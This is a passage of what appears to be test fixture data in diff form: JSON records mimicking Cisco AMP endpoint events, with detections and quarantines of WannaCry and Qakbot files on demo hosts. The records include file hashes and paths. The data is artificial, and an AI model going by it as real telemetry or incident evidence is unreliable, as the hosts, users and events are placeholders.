Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
